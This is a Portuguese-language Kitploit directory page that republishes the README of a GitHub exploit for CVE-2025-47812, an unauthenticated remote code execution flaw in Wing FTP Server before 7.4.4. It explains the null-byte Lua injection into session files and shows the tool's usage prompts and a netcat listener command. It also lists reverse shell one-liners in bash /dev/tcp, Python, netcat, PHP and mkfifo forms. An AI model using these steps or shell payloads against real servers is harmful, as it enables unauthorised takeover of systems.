Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/blindma1den/cve-2025-47812
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoRed TeamingFerramenta de Acesso Remoto
GitHubblindma1den/cve-2025-47812

CVE-2025-47812

Exploit de execução remota de código não autenticado para Wing FTP Server < 7.4.4, permitindo execução de comandos e reverse shells via injeção de Lua em arquivos de sessão.

Ver Repositório
13há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-47812 - Execução Remota de Código (RCE) no Wing FTP Server

===========================================================

Autor: blindma1den

Data: Julho de 2025

Tipo de Exploit: Execução Remota de Código (Não Autenticado)

Alvo: Wing FTP Server < 7.4.4

Pontuação CVSS: 10.0 (Crítico)


DESCRIÇÃO

Este script explora o CVE-2025-47812, uma vulnerabilidade crítica na interface web do Wing FTP Server que permite a atacantes remotos executar comandos arbitrários do sistema ou abrir uma reverse shell sem autenticação.

A falha é causada pelo tratamento inadequado de bytes nulos (%00) no formulário de login (/loginok.html). Isso permite injeção de código Lua em arquivos de sessão, que posteriormente são avaliados quando endpoints como /dir.html são acessados.


FONTES

Descrição NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-47812


FUNCIONALIDADES

  • Execução de comandos (ex.: whoami, uname -a)
  • Múltiplos payloads de reverse shell
  • Extrai automaticamente o cookie de sessão UID
  • Implementação limpa e modular em Python 3

  • REQUISITOS

    • Python 3.7+
    • Módulo requests

    Instale as dependências:

    root@kitploit:~
    pip install requests
    

    USO

    Execute o script:

    root@kitploit:~
    python3 wingftp_rce_exploit.py
    

    Você será solicitado a fornecer:

    • URL alvo (ex.: http://127.0.0.1:5466)
    • Nome de usuário (padrão: anonymous)
    • Modo de exploit: [1] Executar um comando [2] Iniciar reverse shell

    EXEMPLOS

    [1] EXECUTAR COMANDO:

    root@kitploit:~
    Target URL: http://192.168.1.10:5466
    Username: anonymous
    Your choice (1 or 2): 1
    Command to execute (default: whoami): whoami
    

    [2] REVERSE SHELL:

    root@kitploit:~
    Target URL: http://192.168.1.10:5466
    Username: anonymous
    Your choice (1 or 2): 2
    Reverse shell IP address: 192.168.1.100
    Reverse shell port: 4444
    

    Inicie seu listener antes de acionar a shell:

    root@kitploit:~
    nc -lvnp 4444
    

    PAYLOADS UTILIZADOS (REVERSE SHELL)

    Bash: bash -i >& /dev/tcp/IP/PORT 0>&1

    Python3: python3 -c 'import socket,subprocess,os; ...'

    Netcat: nc IP PORT -e /bin/sh

    PHP: php -r '$sock=fsockopen("IP",PORT); ...'

    FIFO + Netcat: rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i ...


    AVISO LEGAL

    Este código é apenas para fins educacionais. NÃO utilize este exploit contra sistemas que você não possui ou para os quais não tenha autorização explícita para testar. O uso não autorizado é ilegal e antiético.

    Atualize seus sistemas imediatamente. O Wing FTP Server 7.4.4 corrige esta vulnerabilidade.

    Feliz hacking!

    Baixar ferramenta